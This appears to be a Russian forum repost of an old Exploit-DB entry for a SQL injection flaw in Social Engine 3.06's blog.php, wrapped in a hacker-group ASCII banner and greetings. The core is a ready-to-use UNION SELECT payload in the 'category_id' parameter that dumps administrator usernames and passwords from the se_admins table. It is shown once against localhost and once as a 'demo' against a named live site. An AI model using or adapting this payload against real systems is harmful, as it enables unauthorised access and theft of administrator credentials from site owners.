Exploit Social Engine 3.06 - 'category_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7900
Проверка EDB
  1. Пройдено
Автор
SNAKESPC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0400
Дата публикации
2009-01-28
Код:
==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: [email protected]:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]
 
Источник
www.exploit-db.com

Похожие темы